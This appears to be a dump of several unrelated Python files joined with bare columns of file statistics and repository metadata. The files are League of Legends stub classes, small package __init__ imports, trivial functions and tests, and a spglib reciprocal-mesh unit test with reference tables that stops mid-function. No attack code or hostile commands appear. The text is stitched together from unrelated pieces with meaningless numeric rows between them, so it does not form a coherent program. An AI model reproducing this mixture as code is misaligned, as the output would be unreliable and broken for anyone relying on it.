class NA_Janna_Top_Annie(Ratings):
    pass
class NA_Janna_Top_Ashe(Ratings):
    pass
class NA_Janna_Top_AurelionSol(Ratings):
    pass
class NA_Janna_Top_Azir(Ratings):
    pass
class NA_Janna_Top_Bard(Ratings):
    pass
class NA_Janna_Top_Blitzcrank(Ratings):
    pass
class NA_Janna_Top_Brand(Ratings):
    pass
class NA_Janna_Top_Braum(Ratings):
    pass
class NA_Janna_Top_Caitlyn(Ratings):
    pass
class NA_Janna_Top_Camille(Ratings):
    pass
class NA_Janna_Top_Cassiopeia(Ratings):
    pass
class NA_Janna_Top_Chogath(Ratings):
    pass
class NA_Janna_Top_Corki(Ratings):
    pass
class NA_Janna_Top_Darius(Ratings):
    pass
class NA_Janna_Top_Diana(Ratings):
    pass
class NA_Janna_Top_Draven(Ratings):
    pass
class NA_Janna_Top_DrMundo(Ratings):
    pass
class NA_Janna_Top_Ekko(Ratings):
    pass
class NA_Janna_Top_Elise(Ratings):
    pass
class NA_Janna_Top_Evelynn(Ratings):
    pass
class NA_Janna_Top_Ezreal(Ratings):
    pass
class NA_Janna_Top_Fiddlesticks(Ratings):
    pass
class NA_Janna_Top_Fiora(Ratings):
    pass
class NA_Janna_Top_Fizz(Ratings):
    pass
class NA_Janna_Top_Galio(Ratings):
    pass
class NA_Janna_Top_Gangplank(Ratings):
    pass
class NA_Janna_Top_Garen(Ratings):
    pass
class NA_Janna_Top_Gnar(Ratings):
    pass
class NA_Janna_Top_Gragas(Ratings):
    pass
class NA_Janna_Top_Graves(Ratings):
    pass
class NA_Janna_Top_Hecarim(Ratings):
    pass
class NA_Janna_Top_Heimerdinger(Ratings):
    pass
class NA_Janna_Top_Illaoi(Ratings):
    pass
class NA_Janna_Top_Irelia(Ratings):
    pass
class NA_Janna_Top_Ivern(Ratings):
    pass
class NA_Janna_Top_Janna(Ratings):
    pass
class NA_Janna_Top_JarvanIV(Ratings):
    pass
class NA_Janna_Top_Jax(Ratings):
    pass
class NA_Janna_Top_Jayce(Ratings):
    pass
class NA_Janna_Top_Jhin(Ratings):
    pass
class NA_Janna_Top_Jinx(Ratings):
    pass
class NA_Janna_Top_Kalista(Ratings):
    pass
class NA_Janna_Top_Karma(Ratings):
    pass
class NA_Janna_Top_Karthus(Ratings):
    pass
class NA_Janna_Top_Kassadin(Ratings):
    pass
class NA_Janna_Top_Katarina(Ratings):
    pass
class NA_Janna_Top_Kayle(Ratings):
    pass
class NA_Janna_Top_Kayn(Ratings):
    pass
class NA_Janna_Top_Kennen(Ratings):
    pass
class NA_Janna_Top_Khazix(Ratings):
    pass
class NA_Janna_Top_Kindred(Ratings):
    pass
class NA_Janna_Top_Kled(Ratings):
    pass
class NA_Janna_Top_KogMaw(Ratings):
    pass
class NA_Janna_Top_Leblanc(Ratings):
    pass
class NA_Janna_Top_LeeSin(Ratings):
    pass
class NA_Janna_Top_Leona(Ratings):
    pass
class NA_Janna_Top_Lissandra(Ratings):
    pass
class NA_Janna_Top_Lucian(Ratings):
    pass
class NA_Janna_Top_Lulu(Ratings):
    pass
class NA_Janna_Top_Lux(Ratings):
    pass
class NA_Janna_Top_Malphite(Ratings):
    pass
class NA_Janna_Top_Malzahar(Ratings):
    pass
class NA_Janna_Top_Maokai(Ratings):
    pass
class NA_Janna_Top_MasterYi(Ratings):
    pass
class NA_Janna_Top_MissFortune(Ratings):
    pass
class NA_Janna_Top_MonkeyKing(Ratings):
    pass
class NA_Janna_Top_Mordekaiser(Ratings):
    pass
class NA_Janna_Top_Morgana(Ratings):
    pass
class NA_Janna_Top_Nami(Ratings):
    pass
class NA_Janna_Top_Nasus(Ratings):
    pass
class NA_Janna_Top_Nautilus(Ratings):
    pass
class NA_Janna_Top_Nidalee(Ratings):
    pass
class NA_Janna_Top_Nocturne(Ratings):
    pass
class NA_Janna_Top_Nunu(Ratings):
    pass
class NA_Janna_Top_Olaf(Ratings):
    pass
class NA_Janna_Top_Orianna(Ratings):
    pass
class NA_Janna_Top_Ornn(Ratings):
    pass
class NA_Janna_Top_Pantheon(Ratings):
    pass
class NA_Janna_Top_Poppy(Ratings):
    pass
class NA_Janna_Top_Quinn(Ratings):
    pass
class NA_Janna_Top_Rakan(Ratings):
    pass
class NA_Janna_Top_Rammus(Ratings):
    pass
class NA_Janna_Top_RekSai(Ratings):
    pass
class NA_Janna_Top_Renekton(Ratings):
    pass
class NA_Janna_Top_Rengar(Ratings):
    pass
class NA_Janna_Top_Riven(Ratings):
    pass
class NA_Janna_Top_Rumble(Ratings):
    pass
class NA_Janna_Top_Ryze(Ratings):
    pass
class NA_Janna_Top_Sejuani(Ratings):
    pass
class NA_Janna_Top_Shaco(Ratings):
    pass
class NA_Janna_Top_Shen(Ratings):
    pass
class NA_Janna_Top_Shyvana(Ratings):
    pass
class NA_Janna_Top_Singed(Ratings):
    pass
class NA_Janna_Top_Sion(Ratings):
    pass
class NA_Janna_Top_Sivir(Ratings):
    pass
class NA_Janna_Top_Skarner(Ratings):
    pass
class NA_Janna_Top_Sona(Ratings):
    pass
class NA_Janna_Top_Soraka(Ratings):
    pass
class NA_Janna_Top_Swain(Ratings):
    pass
class NA_Janna_Top_Syndra(Ratings):
    pass
class NA_Janna_Top_TahmKench(Ratings):
    pass
class NA_Janna_Top_Taliyah(Ratings):
    pass
class NA_Janna_Top_Talon(Ratings):
    pass
class NA_Janna_Top_Taric(Ratings):
    pass
class NA_Janna_Top_Teemo(Ratings):
    pass
class NA_Janna_Top_Thresh(Ratings):
    pass
class NA_Janna_Top_Tristana(Ratings):
    pass
class NA_Janna_Top_Trundle(Ratings):
    pass
class NA_Janna_Top_Tryndamere(Ratings):
    pass
class NA_Janna_Top_TwistedFate(Ratings):
    pass
class NA_Janna_Top_Twitch(Ratings):
    pass
class NA_Janna_Top_Udyr(Ratings):
    pass
class NA_Janna_Top_Urgot(Ratings):
    pass
class NA_Janna_Top_Varus(Ratings):
    pass
class NA_Janna_Top_Vayne(Ratings):
    pass
class NA_Janna_Top_Veigar(Ratings):
    pass
class NA_Janna_Top_Velkoz(Ratings):
    pass
class NA_Janna_Top_Vi(Ratings):
    pass
class NA_Janna_Top_Viktor(Ratings):
    pass
class NA_Janna_Top_Vladimir(Ratings):
    pass
class NA_Janna_Top_Volibear(Ratings):
    pass
class NA_Janna_Top_Warwick(Ratings):
    pass
class NA_Janna_Top_Xayah(Ratings):
    pass
class NA_Janna_Top_Xerath(Ratings):
    pass
class NA_Janna_Top_XinZhao(Ratings):
    pass
class NA_Janna_Top_Yasuo(Ratings):
    pass
class NA_Janna_Top_Yorick(Ratings):
    pass
class NA_Janna_Top_Zac(Ratings):
    pass
class NA_Janna_Top_Zed(Ratings):
    pass
class NA_Janna_Top_Ziggs(Ratings):
    pass
class NA_Janna_Top_Zilean(Ratings):
    pass
class NA_Janna_Top_Zyra(Ratings):
    pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
12197db449ed9d2302cb766473a9c19418fe1aa8
| 104
|
py
|
Python
|
snippetscream/__init__.py
|
shaunsephton/django-snippetscream
|
983d9d9909e233dd7c0d15e1e685a708d1b44dc0
|
[
"BSD-3-Clause"
] | 11
|
2015-01-14T13:03:04.000Z
|
2018-04-24T23:32:14.000Z
|
snippetscream/__init__.py
|
shaunsephton/django-snippetscream
|
983d9d9909e233dd7c0d15e1e685a708d1b44dc0
|
[
"BSD-3-Clause"
] | 2
|
2015-03-26T12:54:41.000Z
|
2017-06-08T06:54:22.000Z
|
snippetscream/__init__.py
|
shaunsephton/django-snippetscream
|
983d9d9909e233dd7c0d15e1e685a708d1b44dc0
|
[
"BSD-3-Clause"
] | 4
|
2015-03-26T13:07:14.000Z
|
2019-07-31T20:32:33.000Z
|
from _186 import *
from _963 import *
from _1031 import *
from _1378 import *
import _1875
import _2536
| 14.857143
| 19
| 0.769231
| 16
| 104
| 4.625
| 0.5
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.261905
| 0.192308
| 104
| 6
| 20
| 17.333333
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
122a56bdb82c76c185efe02228658710d80d62c1
| 191
|
py
|
Python
|
deeptext/__init__.py
|
o-gent/deep-text-recognition-benchmark
|
9e3ea0f21a71a19d957c53e63a30b61ecd7dbf26
|
[
"Apache-2.0"
] | null | null | null |
deeptext/__init__.py
|
o-gent/deep-text-recognition-benchmark
|
9e3ea0f21a71a19d957c53e63a30b61ecd7dbf26
|
[
"Apache-2.0"
] | null | null | null |
deeptext/__init__.py
|
o-gent/deep-text-recognition-benchmark
|
9e3ea0f21a71a19d957c53e63a30b61ecd7dbf26
|
[
"Apache-2.0"
] | null | null | null |
from deeptext import modules
from deeptext import model
from deeptext import dataset
from deeptext import model  # NOTE(review): duplicate of the import two lines up — harmless but redundant
from deeptext import test
from deeptext import train
from deeptext import utils
| 27.285714
| 28
| 0.858639
| 28
| 191
| 5.857143
| 0.321429
| 0.512195
| 0.768293
| 0.280488
| 0.5
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0.141361
| 191
| 7
| 29
| 27.285714
| 1
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1250b167e403fec47514ce3209a8d973cdc1fef6
| 31
|
py
|
Python
|
packages/namespace_packages/folder_a/some_project/alpha.py
|
rockman/learn-python-online
|
9c979fbea7bb2ed502eba2440306ab5a0f4637af
|
[
"MIT"
] | null | null | null |
packages/namespace_packages/folder_a/some_project/alpha.py
|
rockman/learn-python-online
|
9c979fbea7bb2ed502eba2440306ab5a0f4637af
|
[
"MIT"
] | null | null | null |
packages/namespace_packages/folder_a/some_project/alpha.py
|
rockman/learn-python-online
|
9c979fbea7bb2ed502eba2440306ab5a0f4637af
|
[
"MIT"
] | null | null | null |
def run():
    """Return the identifier string of this sample module."""
    name = 'alpha'
    return name
| 7.75
| 18
| 0.548387
| 4
| 31
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.290323
| 31
| 3
| 19
| 10.333333
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d62ba5ac2e6872eb76f6c4dcdce9299b3bbc0462
| 40
|
py
|
Python
|
simplecameraman/tests/test_todo.py
|
kyhau/simple-cameraman
|
b25e807db39a39a92c1145877cdc1f8a67bf852d
|
[
"Unlicense"
] | null | null | null |
simplecameraman/tests/test_todo.py
|
kyhau/simple-cameraman
|
b25e807db39a39a92c1145877cdc1f8a67bf852d
|
[
"Unlicense"
] | 1
|
2020-09-25T09:14:38.000Z
|
2020-09-28T09:13:44.000Z
|
simplecameraman/tests/test_todo.py
|
kyhau/simple-cameraman
|
b25e807db39a39a92c1145877cdc1f8a67bf852d
|
[
"Unlicense"
] | 2
|
2017-04-17T11:19:02.000Z
|
2017-08-24T06:35:42.000Z
|
def test_todo():
    """Placeholder test: asserts a trivially true arithmetic identity."""
    expected = 10 * 10
    assert expected == 100
| 20
| 23
| 0.625
| 7
| 40
| 3.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225806
| 0.225
| 40
| 2
| 23
| 20
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d64297ccc0d0c031f83d79e7f686e74d9e8edafc
| 114
|
py
|
Python
|
remus/etl_pipeline/__init__.py
|
abdala9512/remus
|
b21be11261341d089d27b4370f821c9d3b1bb863
|
[
"MIT"
] | 3
|
2020-08-08T02:18:58.000Z
|
2020-11-11T23:46:34.000Z
|
remus/etl_pipeline/__init__.py
|
abdala9512/remus
|
b21be11261341d089d27b4370f821c9d3b1bb863
|
[
"MIT"
] | 1
|
2021-06-05T03:15:06.000Z
|
2021-06-05T03:15:06.000Z
|
remus/etl_pipeline/__init__.py
|
abdala9512/remus
|
b21be11261341d089d27b4370f821c9d3b1bb863
|
[
"MIT"
] | null | null | null |
from .api_connection import *
from .aws_helper import *
from .sql_helper import *
from .spotify_requests import *
| 28.5
| 31
| 0.789474
| 16
| 114
| 5.375
| 0.5625
| 0.348837
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 114
| 4
| 31
| 28.5
| 0.877551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d64e21b654dd3aa559c2f608f25fb5ed949ede7e
| 15,007
|
py
|
Python
|
python/test/test_reciprocal_mesh.py
|
heirecka/spglib
|
5e5453038c395c62c7f16984135633fb20243d0b
|
[
"BSD-3-Clause"
] | null | null | null |
python/test/test_reciprocal_mesh.py
|
heirecka/spglib
|
5e5453038c395c62c7f16984135633fb20243d0b
|
[
"BSD-3-Clause"
] | null | null | null |
python/test/test_reciprocal_mesh.py
|
heirecka/spglib
|
5e5453038c395c62c7f16984135633fb20243d0b
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import unittest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import numpy as np
from spglib import (get_ir_reciprocal_mesh,
get_stabilized_reciprocal_mesh,
get_symmetry_dataset,
relocate_BZ_grid_address,
get_grid_points_by_rotations,
get_BZ_grid_points_by_rotations)
from vasp import read_vasp
# Absolute directory of this test module; used below to locate the bundled
# POSCAR data files under data_dir/"data".
data_dir = os.path.dirname(os.path.abspath(__file__))
result_ir_rec_mesh = (""" 0 0 0 0
1 1 0 0
2 2 0 0
1 -1 0 0
1 0 1 0
5 1 1 0
6 2 1 0
5 -1 1 0
2 0 2 0
6 1 2 0
10 2 2 0
6 -1 2 0
1 0 -1 0
5 1 -1 0
6 2 -1 0
5 -1 -1 0
1 0 0 1
5 1 0 1
6 2 0 1
5 -1 0 1
5 0 1 1
21 1 1 1
22 2 1 1
21 -1 1 1
6 0 2 1
22 1 2 1
26 2 2 1
22 -1 2 1
5 0 -1 1
21 1 -1 1
22 2 -1 1
21 -1 -1 1
2 0 0 2
6 1 0 2
10 2 0 2
6 -1 0 2
6 0 1 2
22 1 1 2
26 2 1 2
22 -1 1 2
10 0 2 2
26 1 2 2
42 2 2 2
26 -1 2 2
6 0 -1 2
22 1 -1 2
26 2 -1 2
22 -1 -1 2
1 0 0 -1
5 1 0 -1
6 2 0 -1
5 -1 0 -1
5 0 1 -1
21 1 1 -1
22 2 1 -1
21 -1 1 -1
6 0 2 -1
22 1 2 -1
26 2 2 -1
22 -1 2 -1
5 0 -1 -1
21 1 -1 -1
22 2 -1 -1
21 -1 -1 -1""", """ 0 0 0 0
1 1 0 0
2 2 0 0
1 -1 0 0
1 0 1 0
5 1 1 0
5 2 1 0
1 -1 1 0
2 0 2 0
5 1 2 0
2 2 2 0
5 -1 2 0
1 0 -1 0
1 1 -1 0
5 2 -1 0
5 -1 -1 0
16 0 0 1
17 1 0 1
18 2 0 1
17 -1 0 1
17 0 1 1
21 1 1 1
21 2 1 1
17 -1 1 1
18 0 2 1
21 1 2 1
18 2 2 1
21 -1 2 1
17 0 -1 1
17 1 -1 1
21 2 -1 1
21 -1 -1 1""")
result_ir_rec_mesh_distortion = (""" 0 0 0 0
1 1 0 0
1 -1 0 0
3 0 1 0
4 1 1 0
4 -1 1 0
6 0 2 0
7 1 2 0
7 -1 2 0
3 0 -1 0
4 1 -1 0
4 -1 -1 0
3 0 0 1
4 1 0 1
4 -1 0 1
15 0 1 1
16 1 1 1
16 -1 1 1
18 0 2 1
19 1 2 1
19 -1 2 1
15 0 -1 1
16 1 -1 1
16 -1 -1 1
6 0 0 2
7 1 0 2
7 -1 0 2
18 0 1 2
19 1 1 2
19 -1 1 2
30 0 2 2
31 1 2 2
31 -1 2 2
18 0 -1 2
19 1 -1 2
19 -1 -1 2
3 0 0 -1
4 1 0 -1
4 -1 0 -1
15 0 1 -1
16 1 1 -1
16 -1 1 -1
18 0 2 -1
19 1 2 -1
19 -1 2 -1
15 0 -1 -1
16 1 -1 -1
16 -1 -1 -1""", """ 0 0 0 0
1 1 0 0
1 -1 0 0
3 0 1 0
4 1 1 0
5 -1 1 0
6 0 2 0
7 1 2 0
8 -1 2 0
6 0 -2 0
8 1 -2 0
7 -1 -2 0
3 0 -1 0
5 1 -1 0
4 -1 -1 0""", """ 0 0 0 0
1 1 0 0
1 -1 0 0
3 0 1 0
4 1 1 0
4 -1 1 0
3 0 2 0
4 1 2 0
4 -1 2 0
0 0 -1 0
1 1 -1 0
1 -1 -1 0
12 0 0 1
13 1 0 1
13 -1 0 1
15 0 1 1
16 1 1 1
16 -1 1 1
15 0 2 1
16 1 2 1
16 -1 2 1
12 0 -1 1
13 1 -1 1
13 -1 -1 1
24 0 0 2
25 1 0 2
25 -1 0 2
27 0 1 2
28 1 1 2
28 -1 1 2
27 0 2 2
28 1 2 2
28 -1 2 2
24 0 -1 2
25 1 -1 2
25 -1 -1 2
12 0 0 -1
13 1 0 -1
13 -1 0 -1
15 0 1 -1
16 1 1 -1
16 -1 1 -1
15 0 2 -1
16 1 2 -1
16 -1 2 -1
12 0 -1 -1
13 1 -1 -1
13 -1 -1 -1""", """ 0 0 0 0
1 1 0 0
2 -1 0 0
3 0 1 0
4 1 1 0
5 -1 1 0
6 0 2 0
7 1 2 0
7 -1 2 0
3 0 -2 0
5 1 -2 0
4 -1 -2 0
0 0 -1 0
2 1 -1 0
1 -1 -1 0""")
result_bz_grid_address = (""" 0 0 0
1 0 0
2 0 0
-1 0 0
0 1 0
1 1 0
2 1 0
-1 1 0
0 2 0
1 2 0
2 2 0
-1 2 0
0 -1 0
1 -1 0
2 -1 0
-1 -1 0
0 0 1
1 0 1
2 0 1
-1 0 1
0 1 1
1 1 1
2 1 1
-1 1 1
0 2 1
1 2 1
2 2 1
-1 2 1
0 -1 1
1 -1 1
2 -1 1
-1 -1 1
0 0 2
1 0 2
2 0 2
-1 0 2
0 1 2
1 1 2
2 1 2
-1 1 2
0 2 2
1 2 2
2 2 2
-1 2 2
0 -1 2
1 -1 2
2 -1 2
-1 -1 2
0 0 -1
1 0 -1
2 0 -1
-1 0 -1
0 1 -1
1 1 -1
2 1 -1
-1 1 -1
0 2 -1
1 2 -1
2 2 -1
-1 2 -1
0 -1 -1
1 -1 -1
2 -1 -1
-1 -1 -1
-2 0 0
-2 1 0
0 -2 0
1 -2 0
2 -2 0
-2 2 0
-2 -2 0
-1 -2 0
-2 -1 0
-2 0 1
-2 1 1
0 -2 1
1 -2 1
2 -2 1
-2 2 1
-2 -2 1
-1 -2 1
-2 -1 1
0 0 -2
1 0 -2
2 0 -2
-2 0 2
-2 0 -2
-1 0 -2
0 1 -2
1 1 -2
2 1 -2
-2 1 2
-2 1 -2
-1 1 -2
0 2 -2
0 -2 2
0 -2 -2
1 2 -2
1 -2 2
1 -2 -2
2 2 -2
2 -2 2
2 -2 -2
-2 2 2
-2 2 -2
-2 -2 2
-2 -2 -2
-1 2 -2
-1 -2 2
-1 -2 -2
0 -1 -2
1 -1 -2
2 -1 -2
-2 -1 2
-2 -1 -2
-1 -1 -2
-2 0 -1
-2 1 -1
0 -2 -1
1 -2 -1
2 -2 -1
-2 2 -1
-2 -2 -1
-1 -2 -1
-2 -1 -1""", """ 0 0 0
1 0 0
2 0 0
-1 0 0
0 1 0
1 1 0
-2 1 0
-1 1 0
0 2 0
1 -2 0
2 -2 0
-1 2 0
0 -1 0
1 -1 0
2 -1 0
-1 -1 0
0 0 1
1 0 1
2 0 1
-1 0 1
0 1 1
1 1 1
-2 1 1
-1 1 1
0 2 1
1 -2 1
2 -2 1
-1 2 1
0 -1 1
1 -1 1
2 -1 1
-1 -1 1
-2 0 0
0 -2 0
-2 2 0
0 0 -1
1 0 -1
2 0 -1
-2 0 1
-2 0 -1
-1 0 -1
0 1 -1
1 1 -1
-2 1 -1
-1 1 -1
0 2 -1
0 -2 1
0 -2 -1
1 -2 -1
2 -2 -1
-2 2 1
-2 2 -1
-1 2 -1
0 -1 -1
1 -1 -1
2 -1 -1
-1 -1 -1""")
result_bz_map = (""" 0 1 2 -1 -1 -1 64 3 4 5
6 -1 -1 -1 65 7 8 9 10 -1
-1 -1 69 11 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 66 67
68 -1 -1 -1 70 71 12 13 14 -1
-1 -1 72 15 16 17 18 -1 -1 -1
73 19 20 21 22 -1 -1 -1 74 23
24 25 26 -1 -1 -1 78 27 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 75 76 77 -1 -1 -1 79 80
28 29 30 -1 -1 -1 81 31 32 33
34 -1 -1 -1 85 35 36 37 38 -1
-1 -1 91 39 40 41 42 -1 -1 -1
103 43 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 95 98 101 -1
-1 -1 105 108 44 45 46 -1 -1 -1
113 47 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 82 83 84 -1 -1 -1
86 87 88 89 90 -1 -1 -1 92 93
94 97 100 -1 -1 -1 104 107 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 96 99 102 -1 -1 -1 106 109
110 111 112 -1 -1 -1 114 115 48 49
50 -1 -1 -1 116 51 52 53 54 -1
-1 -1 117 55 56 57 58 -1 -1 -1
121 59 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 118 119 120 -1
-1 -1 122 123 60 61 62 -1 -1 -1
124 63""", """ 0 1 2 -1 -1 -1 32 3 4 5
-1 -1 -1 -1 6 7 8 -1 -1 -1
-1 -1 34 11 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 33 9
10 -1 -1 -1 -1 -1 12 13 14 -1
-1 -1 -1 15 16 17 18 -1 -1 -1
38 19 20 21 -1 -1 -1 -1 22 23
24 -1 -1 -1 -1 -1 50 27 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 46 25 26 -1 -1 -1 -1 -1
28 29 30 -1 -1 -1 -1 31 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 35 36 37 -1 -1 -1 39 40
41 42 -1 -1 -1 -1 43 44 45 -1
-1 -1 -1 -1 51 52 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
47 48 49 -1 -1 -1 -1 -1 53 54
55 -1 -1 -1 -1 56""")
class TestReciprocalMesh(unittest.TestCase):
    """Checks spglib's reciprocal-mesh utilities against the reference data
    stored in the module-level result_* string constants."""

    def setUp(self):
        # Identity rotation used as the sole stabilizer when pre-generating
        # plain grid addresses for later BZ relocation tests.
        identity = np.eye(3, dtype='intc')
        # (POSCAR path, mesh divisions) pairs: a cubic and a hexagonal cell.
        file_and_mesh = (
            [os.path.join(data_dir, "data", "cubic", "POSCAR-217"), [4, 4, 4]],
            [os.path.join(data_dir, "data", "hexagonal", "POSCAR-182"),
             [4, 4, 2]])
        self.meshes = []          # mesh divisions per test cell
        self.cells = []           # cells parsed by read_vasp
        self.rotations = []       # symmetry rotations per cell
        self.grid_addresses = []  # grid addresses from the identity-stabilized mesh
        for i, (fname, mesh) in enumerate(file_and_mesh):
            self.meshes.append(mesh)
            self.cells.append(read_vasp(fname))
            self.rotations.append(
                get_symmetry_dataset(self.cells[i])['rotations'])
            _, ga = get_stabilized_reciprocal_mesh(mesh, [identity, ])
            self.grid_addresses.append(ga)

    def tearDown(self):
        pass

    def test_get_ir_reciprocal_mesh(self):
        # Mapping table and grid addresses must match result_ir_rec_mesh[i].
        for i in range(len(self.cells)):
            ir_rec_mesh = get_ir_reciprocal_mesh(self.meshes[i], self.cells[i])
            (mapping_table, grid_address) = ir_rec_mesh
            # for gp, ga in zip(mapping_table, grid_address):
            #     print("%4d %3d %3d %3d" % (gp, ga[0], ga[1], ga[2]))
            # print("")
            data = np.loadtxt(StringIO(result_ir_rec_mesh[i]), dtype='intc')
            np.testing.assert_equal(data[:, 0], mapping_table)
            np.testing.assert_equal(data[:, 1:4], grid_address)

    def test_get_stabilized_reciprocal_mesh(self):
        # With the full rotation set, the stabilized mesh must agree with the
        # same reference data as get_ir_reciprocal_mesh above.
        for i in range(len(self.cells)):
            ir_rec_mesh = get_stabilized_reciprocal_mesh(
                self.meshes[i], self.rotations[i])
            (mapping_table, grid_address) = ir_rec_mesh
            data = np.loadtxt(StringIO(result_ir_rec_mesh[i]), dtype='intc')
            np.testing.assert_equal(data[:, 0], mapping_table)
            np.testing.assert_equal(data[:, 1:4], grid_address)

    def test_get_ir_reciprocal_mesh_distortion(self):
        # Reference results are stored flat in result_ir_rec_mesh_distortion;
        # j walks through them across the (is_shift, mesh) combinations.
        j = 0
        for is_shift in ([0, 0, 0], [0, 1, 0]):
            for i, mesh in enumerate(([3, 4, 4], [3, 5, 1])):
                ir_rec_mesh = get_ir_reciprocal_mesh(mesh, self.cells[i],
                                                     is_shift=is_shift)
                (mapping_table, grid_address) = ir_rec_mesh
                # for gp, ga in zip(mapping_table, grid_address):
